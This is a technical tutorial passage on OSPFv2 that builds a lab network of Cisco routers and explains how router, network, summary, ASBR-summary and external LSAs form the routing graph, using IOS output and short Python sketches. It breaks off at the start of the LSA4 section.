This time I’m going to build the network almost from scratch, examining the effects caused by every significant configuration change. The preparation includes only addressing setup (R5 listed as an example):
R5(config)#interface Loopback0
R5(config-if)# ip address 5.5.5.5 255.255.255.255
R5(config)#interface FastEthernet0/1
R5(config-if)# ip address 192.168.45.5 255.255.255.0
R5(config-if)# no shutdown
LSA1: router LSA
In order to build a graph, one should decide which type of graph is going to be built. According to RFC 2328 section 2.1 OSPF operates with a directed graph: vertices for networks and routers, edges for connections between them. OSPF uses the cost of an output interface as an edge weight (section 2.1.2), thus the directed graph is also a weighted one.
Let’s start with a vertex for R1:
R1(config)#router ospf 1
R1#show ip ospf database
OSPF Router with ID (1.1.1.1) (Process ID 1)
Nothing yet in LSDB as IOS requires at least one interface to be active for OSPF process to initialize. Although it makes sense, it doesn’t help us with graph construction. At this stage it would look like this:
Let’s make IOS happy and add 1.1.1.1/32 to the mix:
R1(config)#router ospf 1
R1(config-router)#router-id 1.1.1.1
R1(config-router)#network 1.1.1.1 0.0.0.0 area 0
R1#
R1#show ip ospf database
OSPF Router with ID (1.1.1.1) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 21 0x80000001 0x00D055 1
We’ve got ourselves the first LSA1. Before looking at its contents, we shall peek at the format first:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            LS age             |    Options    |       1       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Link State ID                         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      Advertising Router                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      LS sequence number                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          LS checksum          |            length             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|    0    |V|E|B|       0       |            # links            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                            Link ID                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Link Data                           |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |     # TOS     |            metric             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                              ...                              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      TOS      |       0       |          TOS metric           |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                            Link ID                            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Link Data                           |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                              ...                              |
The header of LSA1 allows building a vertex for a router, using Link State ID (or Advertising Router) field. The rest of LSA1 (omitting options and flags) is dedicated to networks (vertices) and links (edges). There are 4 types of links available:
point-to-point;
transit;
stub;
virtual.
Let’s see which type of link we have so far:
R1#show ip ospf database router 1.1.1.1
OSPF Router with ID (1.1.1.1) (Process ID 1)
Router Link States (Area 0)
LS age: 55
Options: (No TOS-capability, DC)
LS Type: Router Links
Link State ID: 1.1.1.1
Advertising Router: 1.1.1.1
LS Seq Number: 80000001
Checksum: 0xD055
Length: 36
Number of Links: 1
Link connected to: a Stub Network
(Link ID) Network/subnet number: 1.1.1.1
(Link Data) Network Mask: 255.255.255.255
Number of MTID metrics: 0
TOS 0 Metrics: 1
The 1.1.1.1/32 network is a stub link where end devices usually reside. Such an entity is designed to be a leaf node of the graph, thus no OSPF routers are expected in such a subnet. Stub link is represented by a vertex with a single edge for each direction, connecting to a router node.
This link type has all the necessary information for its part of the graph: network, mask and egress cost (ingress cost is always zero). Adjacent router can be derived from LSA1 header (LSID); however, there is no restriction for the same network vertex to anchor to different router nodes thus enabling ECMP.
The next link type is a point-to-point network: it describes a connection to another router. Let’s enable OSPF on R2 and establish an adjacency over the R1-R2 link using the point-to-point network type:
R1#show ip ospf database
OSPF Router with ID (1.1.1.1) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 41 0x8000001D 0x00B441 3
2.2.2.2 2.2.2.2 42 0x80000001 0x0055CC 2
As expected, a new LSA1, corresponding to R2, is created. However, notice the “odd” link count change: OSPF was enabled on a single interface, but the number of links increased by 2 in each of the LSAs.
R1#show ip ospf database router 1.1.1.1
OSPF Router with ID (1.1.1.1) (Process ID 1)
Router Link States (Area 0)
LS age: 283
Options: (No TOS-capability, DC)
LS Type: Router Links
Link State ID: 1.1.1.1
Advertising Router: 1.1.1.1
LS Seq Number: 8000001D
Checksum: 0xB441
Length: 60
Number of Links: 3
Link connected to: a Stub Network
(Link ID) Network/subnet number: 1.1.1.1
(Link Data) Network Mask: 255.255.255.255
Number of MTID metrics: 0
TOS 0 Metrics: 1
Link connected to: another Router (point-to-point)
(Link ID) Neighboring Router ID: 2.2.2.2
(Link Data) Router Interface address: 192.168.12.1
Number of MTID metrics: 0
TOS 0 Metrics: 1
Link connected to: a Stub Network
(Link ID) Network/subnet number: 192.168.12.0
(Link Data) Network Mask: 255.255.255.0
Number of MTID metrics: 0
TOS 0 Metrics: 1
A single interface with IP network assigned creates 2 entities: a stub network (it’s an addressable subnet after all) and a point-to-point link corresponding to a graph edge between router vertices. An adjacent router node is referenced by LSID so that the edge for bidirectional connectivity between nodes could be correctly described with a pair of LSA1. Two-way adjacency is crucial for the edge between router vertices, although the cost for each direction might differ. Next-hop for IP forwarding is also readily available from link data for point-to-point connections.
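To make the mapping from LSA1 links to graph elements more tangible, here is a minimal sketch. The data layout and function name are made up for illustration; R1's links are copied from the output above, and R2's two links are assumed to mirror R1's side of the connection. Following the description above, a stub network gets an edge in each direction with a zero cost towards the router, and a point-to-point edge is installed only if the neighbour lists the router back.

```python
from collections import defaultdict

# (link type, link ID, cost) tuples per advertising router
ROUTER_LSAS = {
    "1.1.1.1": [
        ("stub", "1.1.1.1/32", 1),
        ("p2p", "2.2.2.2", 1),
        ("stub", "192.168.12.0/24", 1),
    ],
    "2.2.2.2": [
        ("p2p", "1.1.1.1", 1),
        ("stub", "192.168.12.0/24", 1),
    ],
}


def build_graph(lsas):
    """Return graph[src][dst] = cost built from router LSAs."""
    graph = defaultdict(dict)
    for router_id, links in lsas.items():
        for link_type, link_id, cost in links:
            if link_type == "stub":
                graph[router_id][link_id] = cost  # router -> network
                graph[link_id][router_id] = 0     # network -> router
            elif link_type == "p2p":
                # two-way check: the neighbour must advertise a link back
                neighbour_links = lsas.get(link_id, [])
                if any(t == "p2p" and i == router_id for t, i, _ in neighbour_links):
                    graph[router_id][link_id] = cost
    return dict(graph)


graph = build_graph(ROUTER_LSAS)
for src in sorted(graph):
    print(src, "->", graph[src])
```

Note that 192.168.12.0/24 ends up attached to both routers, which is the same anchoring that allows ECMP towards a stub network.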
Since the costs of the links are left by default and thus are equal, the following graph is formed:
Virtual link is out of scope of this article since it’s considered an ad-hoc crutch for extinguishing immediate fires rather than a permanent solution within a proper design. However, it’s still a curious entity in OSPFv2, so if you’re eager to spend some time with it, there is a relevant article by Petr Lapukhov.
There is only one link type left: transit link (don’t confuse it with transit capability!).
LSA2: network LSA
Point-to-point connections are able to describe direct links between routers; however, there could be L2 segments that might be either broadcast-capable (e.g., Ethernet) or NBMA (e.g., DMVPN). The latter type usually employs a bundle of logical point-to-point adjacencies since the logical topology is hub-and-spoke, so these connections are easily modelled in OSPF already.
Broadcast medium, however, poses a scalability problem and thus requires a different approach. Consider the Ethernet segment between R2, R3 and R4. Obviously, it is impossible to have an edge that connects more than 2 nodes. Although routers could establish direct adjacencies, it would not scale very well because the number of connections would grow as O(n²), resulting in higher CPU and RAM usage.
The optimization idea is simple: introduce a single pseudo-node that every router in the L2 segment would connect to. Such an approach reduces the number of active adjacencies from O(n²) to O(n), increasing scalability in the end. The router responsible for maintaining the pseudo-node is called a designated router (DR); the vertex that corresponds to the pseudo-node is described by LSA2; the edge towards the pseudo-node is defined by a transit link in LSA1 and the contents of LSA2.
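A quick back-of-the-envelope comparison shows the difference in growth. The function names are illustrative, and the model only counts connections in the graph: one per router pair for a full mesh versus one per router towards the pseudo-node. A real segment also keeps adjacencies with the BDR, which does not change the linear growth.

```python
def full_mesh_links(n):
    """Every pair of routers is connected directly."""
    return n * (n - 1) // 2


def pseudo_node_links(n):
    """Every router connects to the pseudo-node only."""
    return n


for n in (3, 10, 50):
    print(f"{n} routers: full mesh {full_mesh_links(n)}, pseudo-node {pseudo_node_links(n)}")
```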
Let’s enable OSPF on R2, R3 and R4, leaving the OSPF network type as is (broadcast by default):
R2(config)#interface f0/0
R2(config-if)#ip ospf 1 area 0
R2#show ip ospf neighbor
Neighbor ID Pri State Dead Time Address Interface
3.3.3.3 1 FULL/BDR 00:00:38 192.168.234.3 FastEthernet0/0
4.4.4.4 1 FULL/DR 00:00:35 192.168.234.4 FastEthernet0/0
1.1.1.1 0 FULL/ - 00:00:35 192.168.12.1 FastEthernet0/1
R2#
R2#show ip ospf database
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 538 0x80000022 0x00AA46 3
2.2.2.2 2.2.2.2 116 0x80000008 0x005804 3
3.3.3.3 3.3.3.3 118 0x80000002 0x004228 1
4.4.4.4 4.4.4.4 117 0x80000002 0x00045D 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 117 0x80000001 0x00F0B8
As we can see, LSA2 is indeed issued by R4 (4.4.4.4), which is currently the DR. The simplified election process is straightforward:
build a list of routers participating in the election (non-zero priority);
select highest priority;
select highest RID.
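The three steps can be sketched as follows. This is a deliberately simplified model with a made-up function name: it ignores the BDR and the fact that an already elected DR is not preempted, and it assumes router IDs are written in dotted-decimal form.

```python
import ipaddress


def elect_dr(routers):
    """routers maps router ID (dotted decimal) to OSPF priority."""
    # Step 1: only routers with a non-zero priority take part
    eligible = {rid: prio for rid, prio in routers.items() if prio > 0}
    if not eligible:
        return None
    # Steps 2 and 3: highest priority wins, highest RID breaks ties
    return max(
        eligible,
        key=lambda rid: (eligible[rid], int(ipaddress.IPv4Address(rid))),
    )


segment = {"2.2.2.2": 1, "3.3.3.3": 1, "4.4.4.4": 1}
print(elect_dr(segment))
```

With equal priorities on R2, R3 and R4 the highest RID decides, which agrees with R4 being the DR in the output above.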
Backup DR (BDR) is elected in the same way as DR with a subtle difference: an elected DR cannot be preempted while a BDR can. Since the DR is responsible for the pseudo-node, this router synchronizes the LSDB with every node in the segment, reaching the FULL state of adjacency. The BDR behaves the same as the DR except that it does not generate LSA2, which minimizes the disruption caused by a DR failure.
Let’s take a look at LSA1 first:
R2#show ip ospf database router 2.2.2.2
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
LS age: 425
Options: (No TOS-capability, DC)
LS Type: Router Links
Link State ID: 2.2.2.2
Advertising Router: 2.2.2.2
LS Seq Number: 8000000F
Checksum: 0x4A0B
Length: 60
Number of Links: 3
Link connected to: a Transit Network
(Link ID) Designated Router address: 192.168.234.4
(Link Data) Router Interface address: 192.168.234.2
Number of MTID metrics: 0
TOS 0 Metrics: 1
Link connected to: another Router (point-to-point)
(Link ID) Neighboring Router ID: 1.1.1.1
(Link Data) Router Interface address: 192.168.12.2
Number of MTID metrics: 0
TOS 0 Metrics: 1
Link connected to: a Stub Network
(Link ID) Network/subnet number: 192.168.12.0
(Link Data) Network Mask: 255.255.255.0
Number of MTID metrics: 0
TOS 0 Metrics: 1
At last, we meet the transit link. As you might have guessed, DR ID corresponds to LSA2 LSID and is equal to DR IP address. As with point-to-point links, next-hop IP address and cost are also present in this data structure. However, the LSA1 still does not fully describe the two-way connectivity as there is only a half of information required for building an edge. Besides, IP addressing for L2 segment is missing. Let’s peek at LSA2 format:
LSA2 should contain the missing pieces of the puzzle: a list of connected RIDs and the network mask.
R2#show ip ospf database network
OSPF Router with ID (2.2.2.2) (Process ID 1)
Net Link States (Area 0)
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 459
Options: (No TOS-capability, DC)
LS Type: Network Links
Link State ID: 192.168.234.4 (address of Designated Router)
Advertising Router: 4.4.4.4
LS Seq Number: 80000002
Checksum: 0xEEB9
Length: 36
Network Mask: /24
Attached Router: 4.4.4.4
Attached Router: 2.2.2.2
Attached Router: 3.3.3.3
Now we have all the information needed to extend the graph using transit segment:
A few things are worth mentioning here. The first is the zero egress cost from the pseudo-node: it does not introduce any penalty into path calculation. Second, subnet information is embedded in LSA2: the mask is listed explicitly and the network itself can be derived using LSID and the prefix length.
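Both observations are easy to verify with Python's standard ipaddress module. The helper names below are made up; the LSID, prefix length and attached routers are taken from the LSA2 output above.

```python
import ipaddress


def transit_network(lsid, prefix_len):
    """Derive the subnet by masking the DR address stored in LSID."""
    return ipaddress.ip_network(f"{lsid}/{prefix_len}", strict=False)


def pseudo_node_edges(lsid, attached_routers):
    """Edges leaving the pseudo-node always have zero cost."""
    return {(lsid, rid): 0 for rid in attached_routers}


print(transit_network("192.168.234.4", 24))  # 192.168.234.0/24
print(pseudo_node_edges("192.168.234.4", ["4.4.4.4", "2.2.2.2", "3.3.3.3"]))
```

The cost in the opposite direction, from a router into the pseudo-node, comes from the transit link in that router's LSA1.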
it eliminates stub link types on point-to-point adjacencies;
it assigns /32 mask to LSA2 as a special indicator to ignore the subnet; the worst-case scenario – DR IP address would be reachable but not the whole subnet.
Using LSA1 and LSA2 data structures, it’s possible to create a graph that describes the whole OSPF area. However, there is also a notion of external prefixes and several areas in OSPF – that’s where we’re headed next.
LSA5: AS-external LSA
This LSA is pretty straightforward: it announces an external subnet, mask and a few knobs to make life easier (no). The format is shown below:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            LS age             |    Options    |       5       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Link State ID                         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      Advertising Router                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      LS sequence number                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          LS checksum          |            length             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Network Mask                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|E|      0      |                    metric                     |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      Forwarding address                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      External Route Tag                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|E|     TOS     |                  TOS metric                   |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      Forwarding address                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      External Route Tag                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                              ...                              |
LSID is equal to the network number, while mask and metric are listed explicitly… Everything is there to build a vertex and corresponding edges, pretty much like stub networks in LSA1. If you want to know more about Forwarding address (FA), check out this blog and its links for a series dedicated to LSA5 FA and its effects, which sometimes might prove somewhat useful. For the rest of the data, RFC 2328 section A.4.5 is more than enough.
In our topology R3 is the one to generate LSA5 with loopback redistribution:
R3(config)#router ospf 1
R3(config-router)#redistribute connected subnets
R3#
R3#show ip ospf database
OSPF Router with ID (3.3.3.3) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 441 0x80000025 0x00A449 3
2.2.2.2 2.2.2.2 962 0x80000011 0x00460D 3
3.3.3.3 3.3.3.3 23 0x80000009 0x003A27 1
4.4.4.4 4.4.4.4 1085 0x8000000A 0x00F365 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 835 0x80000004 0x00EABB
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
3.3.3.3 3.3.3.3 2 0x80000001 0x000385 0
R3#
R3#show ip ospf database external
OSPF Router with ID (3.3.3.3) (Process ID 1)
Type-5 AS External Link States
LS age: 38
Options: (No TOS-capability, DC, Upward)
LS Type: AS External Link
Link State ID: 3.3.3.3 (External Network Number )
Advertising Router: 3.3.3.3
LS Seq Number: 80000001
Checksum: 0x385
Length: 36
Network Mask: /32
Metric Type: 2 (Larger than any link state path)
MTID: 0
Metric: 20
Forward Address: 0.0.0.0
External Route Tag: 0
Keep in mind that LSA5 is flooded within the whole AS, not just OSPF area. In order to build the graph further, we need a vertex (LSA5 LSID) and an edge (Advertising Router) along with its weight:
That’s it for LSA5 role in the graph. Almost.
LSA3: summary LSA
Let’s switch to inter-area communication for a moment. Beware of the first thought: this LSA is not intended for prefix summarization in the usual sense. It is used to summarize topology information from another area: LSA1 and LSA2, used for building a graph, are not transferred between areas but morphed into LSA3 based on LSDB or RIB contents (more on that later). LSA3 format is shown below:
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            LS age             |    Options    |       3       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Link State ID                         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      Advertising Router                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                      LS sequence number                       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          LS checksum          |            length             |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                         Network Mask                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|       0       |                    metric                     |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      TOS      |                  TOS metric                   |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                              ...                              |
The idea is pretty much the same as with LSA5: transfer a network (LSA3 LSID), its mask and the corresponding metric to another area. In order to conserve the computing resources of the routers and thus make an OSPF AS more scalable, no topology information is exchanged between areas, so multi-area OSPF acts as a distance-vector (DV) routing protocol between areas. This is the reason why some authors call this IGP a hybrid one (EIGRP is a pure DV IGP, although quite an advanced one). DV logic usually requires some loop prevention mechanism like split-horizon, DUAL and so on. OSPF, however, employs a completely different logic: LSA3 can cross an area border only when one of the areas is area 0, aka the backbone area. This concept creates a small tree: area 0 is the root while all other areas sit on the same level below it. No routing loops can occur between areas in such a setup, as the only path between two non-backbone areas runs through the backbone.
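To make the layout above more tangible, here is a minimal sketch that decodes the fixed part of an LSA3 (the 20-byte LSA header, the mask and the metric) with Python's `struct` module. The function name `parse_summary_lsa` is hypothetical, optional TOS entries are ignored, the checksum is not verified, and the Options byte (0x22) in the sample is an assumption; the remaining sample values mirror the 5.5.5.5/32 LSA3 used in this article.

```python
import ipaddress
import struct


def parse_summary_lsa(data: bytes) -> dict:
    """Decode the LSA header plus the mask/metric of a type 3 (or 4) LSA."""
    # Header: age, options, type, LSID, advertising router, seq, checksum, length
    age, options, ls_type, lsid, adv, seq, cksum, length = struct.unpack(
        "!HBB4s4sIHH", data[:20]
    )
    # Body: 4-byte network mask, then one zero byte followed by a 24-bit metric
    mask, metric_word = struct.unpack("!4sI", data[20:28])
    return {
        "type": ls_type,
        "lsid": str(ipaddress.IPv4Address(lsid)),
        "adv_router": str(ipaddress.IPv4Address(adv)),
        "prefix_len": bin(int.from_bytes(mask, "big")).count("1"),
        "metric": metric_word & 0xFFFFFF,  # drop the leading zero byte
        "length": length,
    }


# Sample LSA3 assembled by hand; Options 0x22 is assumed, not taken from a capture.
sample = struct.pack(
    "!HBB4s4sIHH4sI",
    823, 0x22, 3,
    ipaddress.IPv4Address("5.5.5.5").packed,
    ipaddress.IPv4Address("4.4.4.4").packed,
    0x80000001, 0x3ED8, 28,
    ipaddress.IPv4Address("255.255.255.255").packed,
    2,
)
lsa = parse_summary_lsa(sample)
print(lsa)
```

Header (20 bytes) plus mask (4 bytes) plus metric word (4 bytes) adds up to 28 bytes, which is the Length that IOS reports for an LSA3 without TOS entries.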
R5(config)#router ospf 1
R5(config-router)#router-id 5.5.5.5
R5(config)#interface f0/1
R5(config-if)#ip ospf 1 area 1
R5(config-if)#ip ospf network point-to-point
R5(config)#interface lo 1
R5(config-if)#ip address 5.5.5.5 255.255.255.255
R5(config-if)#ip ospf 1 area 1
R5(config)#interface lo 2
R5(config-if)#ip address 5.5.5.55 255.255.255.255
R5(config-if)#ip ospf 1 area 1
R2#show ip ospf database
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 782 0x80000027 0x00A04B 3
2.2.2.2 2.2.2.2 1339 0x80000013 0x00420F 3
3.3.3.3 3.3.3.3 422 0x8000000B 0x003629 1
4.4.4.4 4.4.4.4 252 0x8000000D 0x00F064 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 1235 0x80000006 0x00E6BD
Summary Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
5.5.5.5 4.4.4.4 170 0x80000001 0x003ED8
5.5.5.55 4.4.4.4 156 0x80000001 0x00489C
192.168.45.0 4.4.4.4 242 0x80000001 0x00781D
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
3.3.3.3 3.3.3.3 422 0x80000003 0x00FE87 0
As expected, prefixes from area 1 are seen through LSA3. R4, being an ABR, is listed as the advertising router. From the backbone’s point of view, all these prefixes are directly connected to R4, which keeps the area 1 topology concealed.
R2#show ip ospf database summary adv-router 4.4.4.4
OSPF Router with ID (2.2.2.2) (Process ID 1)
Summary Net Link States (Area 0)
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 823
Options: (No TOS-capability, DC, Upward)
LS Type: Summary Links(Network)
Link State ID: 5.5.5.5 (summary Network Number)
Advertising Router: 4.4.4.4
LS Seq Number: 80000001
Checksum: 0x3ED8
Length: 28
Network Mask: /32
MTID: 0 Metric: 2
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 809
Options: (No TOS-capability, DC, Upward)
LS Type: Summary Links(Network)
Link State ID: 5.5.5.55 (summary Network Number)
Advertising Router: 4.4.4.4
LS Seq Number: 80000001
Checksum: 0x489C
Length: 28
Network Mask: /32
MTID: 0 Metric: 2
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 895
Options: (No TOS-capability, DC, Upward)
LS Type: Summary Links(Network)
Link State ID: 192.168.45.0 (summary Network Number)
Advertising Router: 4.4.4.4
LS Seq Number: 80000001
Checksum: 0x781D
Length: 28
Network Mask: /24
MTID: 0 Metric: 1
We have enough experience now to reconstruct area 1 graph from its LSDB so the focus for the rest of the article would be area 0 point of view on OSPF AS.
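From the area 0 point of view, the distance-vector part boils down to simple addition: the cost of an inter-area route is the SPF cost to the ABR plus the metric carried in LSA3. The sketch below applies that to the three LSA3s advertised by R4. The function name `inter_area_routes` is hypothetical, and the cost of 1 from R2 to R4 is an assumption (a FastEthernet link at its default cost).

```python
def inter_area_routes(cost_to_abr, summaries):
    """Pick the cheapest (total_cost, abr) per prefix from a list of LSA3s.

    cost_to_abr: {abr_router_id: intra-area SPF cost to that ABR}
    summaries:   iterable of (prefix, advertising_abr, lsa3_metric)
    """
    routes = {}
    for prefix, abr, metric in summaries:
        if abr not in cost_to_abr:
            continue  # ABR is not reachable inside the area, LSA3 is unusable
        total = cost_to_abr[abr] + metric
        if prefix not in routes or total < routes[prefix][0]:
            routes[prefix] = (total, abr)
    return routes


cost_to_abr = {"4.4.4.4": 1}  # assumed cost from R2 to R4
summaries = [
    ("5.5.5.5/32", "4.4.4.4", 2),
    ("5.5.5.55/32", "4.4.4.4", 2),
    ("192.168.45.0/24", "4.4.4.4", 1),
]
routes = inter_area_routes(cost_to_abr, summaries)
for prefix, (cost, abr) in routes.items():
    print(f"O IA {prefix} cost {cost} via ABR {abr}")
```

R2 needs to know nothing about area 1 beyond these metrics, which is exactly what makes the inter-area part behave like a distance-vector protocol.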
The only thing left to verify is the trigger for LSA3 generation. Let’s filter 5.5.5.55/32 from R4’s RIB and see whether it is still propagated into area 0 while being absent from the routing table.
R4(config)#ip prefix-list FILTER deny 5.5.5.55/32
R4(config)#ip prefix-list FILTER permit 0.0.0.0/0 le 32
R4(config)#router ospf 1
R4(config-router)#distribute-list prefix FILTER in
R4#
R4#show ip route ospf
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
O 1.1.1.1 [110/3] via 192.168.234.2, 00:00:05, FastEthernet0/0
3.0.0.0/32 is subnetted, 1 subnets
O E2 3.3.3.3 [110/20] via 192.168.234.3, 00:00:05, FastEthernet0/0
5.0.0.0/32 is subnetted, 1 subnets
O 5.5.5.5 [110/2] via 192.168.45.5, 00:00:05, FastEthernet0/1
O 192.168.12.0/24 [110/2] via 192.168.234.2, 00:00:05, FastEthernet0/0
R2#show ip ospf database
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 228 0x80000028 0x009E4C 3
2.2.2.2 2.2.2.2 804 0x80000014 0x004010 3
3.3.3.3 3.3.3.3 1868 0x8000000B 0x003629 1
4.4.4.4 4.4.4.4 1697 0x8000000D 0x00F064 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 653 0x80000007 0x00E4BE
Summary Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
5.5.5.5 4.4.4.4 1615 0x80000001 0x003ED8
5.5.5.55 4.4.4.4 1602 0x80000001 0x00489C
192.168.45.0 4.4.4.4 1688 0x80000001 0x00781D
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
3.3.3.3 3.3.3.3 1868 0x80000003 0x00FE87 0
R2#
R2#show ip route ospf
<output omitted>
1.0.0.0/32 is subnetted, 1 subnets
O 1.1.1.1 [110/2] via 192.168.12.1, 06:10:34, FastEthernet0/1
3.0.0.0/32 is subnetted, 1 subnets
O E2 3.3.3.3 [110/20] via 192.168.234.3, 01:37:25, FastEthernet0/0
5.0.0.0/32 is subnetted, 2 subnets
O IA 5.5.5.5 [110/3] via 192.168.234.4, 00:26:58, FastEthernet0/0
O IA 5.5.5.55 [110/3] via 192.168.234.4, 00:26:44, FastEthernet0/0
O IA 192.168.45.0/24 [110/2] via 192.168.234.4, 00:28:10, FastEthernet0/0
According to RFC 2328 section 12.4.3, LSA3 routes are “determined by examining the routing table structure”. However, filtering 5.5.5.55/32 from the RIB does not prevent R4 (IOS) from generating the corresponding LSA3 into the backbone area. Unlike DV IGPs, OSPF is not designed for RIB filtering at an arbitrary point in the network, which is why using such a knob is generally not a good idea.
LSA4: ASBR-summary LSA
As you might have already guessed, LSA4 summarizes topology information about ASBRs. Remember that LSA5 propagates throughout the whole AS? An LSA can be changed only by its originator to ensure LSDB consistency, so LSA5 crosses area borders unmodified. As a result, if the ASBR is located in a different area, there is no vertex to anchor the LSA5 to, since its Advertising Router ID is unknown within the local area. The mission of LSA4 is to fix this misfortune. It has the same layout as LSA3:
